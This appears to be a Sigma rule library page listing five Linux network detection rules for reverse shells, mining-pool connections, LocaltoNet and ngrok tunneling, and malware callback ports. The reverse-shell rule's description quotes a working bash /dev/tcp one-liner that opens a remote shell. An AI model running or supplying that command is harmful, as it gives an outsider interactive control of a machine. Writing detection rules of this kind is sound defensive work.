Rule Library

Sigma Rules

5 rules found

3,707 Total
3,116 Detection
451 Emerging
137 Hunting
Detection · critical · test

Linux Reverse Shell Indicator

Detects a bash process connecting to a remote IP address (often found when actors do something like 'bash -i >& /dev/tcp/10.0.0.1/4242 0>&1')

Linux · Network Connection
TA0002 · Execution · T1059.004 · Unix Shell
Florian Roth (Nextron Systems) · Sat Oct 16 · linux
Detection · high · stable

Linux Crypto Mining Pool Connections

Detects process connections to a Monero crypto mining pool

Linux · Network Connection
TA0040 · Impact · T1496 · Resource Hijacking
Florian Roth (Nextron Systems) · Tue Oct 26 · linux
Detection · high · test

Communication To LocaltoNet Tunneling Service Initiated - Linux

Detects an executable initiating a network connection to "LocaltoNet" tunneling sub-domains. LocaltoNet is a reverse proxy that enables localhost services to be exposed to the Internet. Attackers have been seen to use this service for command-and-control activities to bypass MFA and perimeter controls.

Linux · Network Connection
TA0011 · Command and Control · T1572 · Protocol Tunneling · T1090 · Proxy · T1102 · Web Service
Andreas Braathen (mnemonic.io) · Mon Jun 17 · linux
Detection · high · test

Communication To Ngrok Tunneling Service - Linux

Detects an executable accessing an ngrok tunneling endpoint, which could be a sign of forbidden data exfiltration by malicious actors

Linux · Network Connection
TA0010 · Exfiltration · TA0011 · Command and Control · T1567 · Exfiltration Over Web Service · T1568.002 · Domain Generation Algorithms · +4
Florian Roth (Nextron Systems) · Thu Nov 03 · linux
Detection · high · test

Potentially Suspicious Malware Callback Communication - Linux

Detects programs that connect to known malware callback ports based on threat intelligence reports.

Linux · Network Connection
TA0003 · Persistence · TA0011 · Command and Control · T1571 · Non-Standard Port
hasselj · Fri May 10 · linux